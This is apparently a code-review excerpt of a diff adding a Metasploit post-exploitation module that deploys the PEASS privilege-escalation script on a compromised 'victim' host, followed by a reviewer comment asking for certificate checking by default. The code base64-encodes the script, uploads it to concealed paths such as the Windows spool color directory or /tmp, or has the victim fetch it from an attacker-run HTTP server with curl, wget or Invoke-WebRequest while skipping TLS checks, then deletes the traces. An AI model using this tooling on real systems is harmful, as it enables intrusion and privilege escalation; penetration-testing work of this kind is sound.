modules/post/multi/gather/peass.rb

```diff
@@ -0,0 +1,396 @@
+    else
+      # If no Windows, check if base64 exists
+      if !session.platform.include?('win')
+        base64_path = cmd_exec('command -v base64')
+        raise 'base64 not found on victim, set a 32B length password!' unless base64_path.include?('base64')
+      end
+
+      # Encode PEASS script
+      print_status('Encoding PEASS in Base64...')
+      peass_script_64 = Base64.strict_encode64(peass_script)
+
+      # Needed code to decode it in Unix and Windows
+      decode_linpeass_cmd = 'base64 -d'
+      load_winpeas = "$#{Rex::Text.rand_text_alphanumeric(6)} = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($#{ps_var1}));"
+
+    end
+
+    # Write obfuscated PEASS to a local file
+    file = Tempfile.new('peass_metasploit')
+    file.write(peass_script_64)
+    file.rewind
+    @temp_file_path = file.path
+
+    if datastore['SRVHOST'] == ''
+      # Upload file to victim
+      temp_peass_name = Rex::Text.rand_text_alphanumeric(5)
+      if datastore['TEMP_DIR'] != ''
+        temp_path = datastore['TEMP_DIR']
+        if temp_path[0] == '/'
+          temp_path += "/#{temp_peass_name}"
+        else
+          temp_path += "\\#{temp_peass_name}"
+        end
+
+      elsif session.platform.include?('win')
+        temp_path = "C:\\Windows\\System32\\spool\\drivers\\color\\#{temp_peass_name}"
+      else
+        temp_path = "/tmp/#{temp_peass_name}"
+      end
+
+      print_status("Uploading obfuscated peass to #{temp_path}...")
+      upload_file(temp_path, file.path)
+      print_good('Uploaded')
+
+      # Start the cmd, prepare to read from the uploaded file
+      if session.platform.include?('win')
+        cmd = "$ProgressPreference = 'SilentlyContinue'; $#{ps_var1} = Get-Content -Path #{temp_path};"
+        last_cmd = "del #{temp_path};"
+      else
+        cmd = "cat #{temp_path}"
+        last_cmd = " ; rm #{temp_path}"
+      end
+
+    # Instead of writing the file to disk, download it from HTTP
+    else
+      last_cmd = ''
+      # Start HTTP server
+      start_service
+
+      http_protocol = datastore['SSL'] ? 'https://' : 'http://'
+      http_ip = datastore['SRVHOST']
+      http_port = ":#{datastore['SRVPORT']}"
+      http_path = datastore['URIPATH']
+      url_download_peass = http_protocol + http_ip + http_port + http_path
+      print_good("Listening in #{url_download_peass}")
+
+      # Configure the download of the script in Windows
+      if session.platform.include?('win')
+        cmd = "$ProgressPreference = 'SilentlyContinue';"
+        cmd += get_bypass_tls_cert
+        cmd += "$#{ps_var1} = Invoke-WebRequest \"#{url_download_peass}\" -UseBasicParsing | Select-Object -ExpandProperty Content;"
+
+      # Configure the download of the script in Unix
+      else
+        cmd = "curl -k -s \"#{url_download_peass}\""
+        curl_path = cmd_exec('command -v curl')
+        if !curl_path.include?('curl')
+          cmd = "wget --no-check-certificate -q -O - \"#{url_download_peass}\""
```

Comment:
Would we be able to make this a datastore option where checking certificates is the default? Maybe a generic option that covers security checks for all methods of downloading.